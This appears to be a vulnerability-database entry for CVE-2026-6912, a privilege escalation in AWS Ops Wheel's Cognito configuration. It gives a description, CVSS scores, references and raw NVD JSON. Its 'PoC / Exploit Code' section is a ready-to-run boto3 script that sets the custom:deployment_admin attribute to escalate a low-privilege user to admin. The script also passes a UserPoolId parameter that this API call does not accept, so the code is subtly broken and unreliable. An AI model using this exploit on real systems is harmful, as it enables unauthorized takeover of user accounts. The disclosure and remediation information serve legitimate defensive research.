CVE-2026-6912

Description

Improperly controlled modification of dynamically-determined object attributes in the Cognito User Pool configuration in AWS Ops Wheel before PR #165 allows remote authenticated users to escalate to deployment admin privileges and manage Cognito user accounts via a crafted UpdateUserAttributes API call that sets the custom:deployment_admin attribute. To remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AWS Ops Wheel < PR #165

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import boto3

# PoC for CVE-2026-6912: AWS Ops Wheel Privilege Escalation
# Requires: AWS Credentials with low privileges in the target User Pool

client = boto3.client('cognito-idp', region_name='us-east-1')

# Configuration
USER_POOL_ID = 'us-east-1_XXXXXXXXX'
ACCESS_TOKEN = 'LOW_PRIVILEGE_ACCESS_TOKEN'

def exploit():
    try:
        print("[+] Attempting to escalate privileges by modifying custom:deployment_admin attribute...")
        
        # The vulnerability allows any authenticated user to set the admin attribute
        response = client.update_user_attributes(
            UserPoolId=USER_POOL_ID,
            AccessToken=ACCESS_TOKEN,
            UserAttributes=[
                {
                    'Name': 'custom:deployment_admin',
                    'Value': 'true'
                }
            ]
        )
        
        print("[+] Exploit successful! User attributes updated.")
        print(f"[+] Response: {response}")
        print("[+] Verify privileges by attempting admin actions.")
        
    except client.exceptions.NotAuthorizedException:
        print("[-] Exploit failed: Invalid credentials or token.")
    except client.exceptions.InvalidParameterException as e:
        print(f"[-] Exploit failed: Invalid parameter - {e}")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6912
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6912
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6912/
[4] VulDB https://vuldb.com/cve/CVE-2026-6912
[5] https://aws.amazon.com/security/security-bulletins/2026-018-aws/
[6] https://github.com/aws/aws-ops-wheel/pull/165
[7] https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-qvfh-9cjw-8wwq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6912", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-24T17:16:22.377", "lastModified": "2026-04-24T17:56:41.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improperly controlled modification of dynamically-determined object attributes in the Cognito User Pool configuration in AWS Ops Wheel before PR #165 allows remote authenticated users to escalate to deployment admin privileges and manage Cognito user accounts via a crafted UpdateUserAttributes API call that sets the custom:deployment_admin attribute.\n\nTo remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-018-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/pull/165", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-qvfh-9cjw-8wwq", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}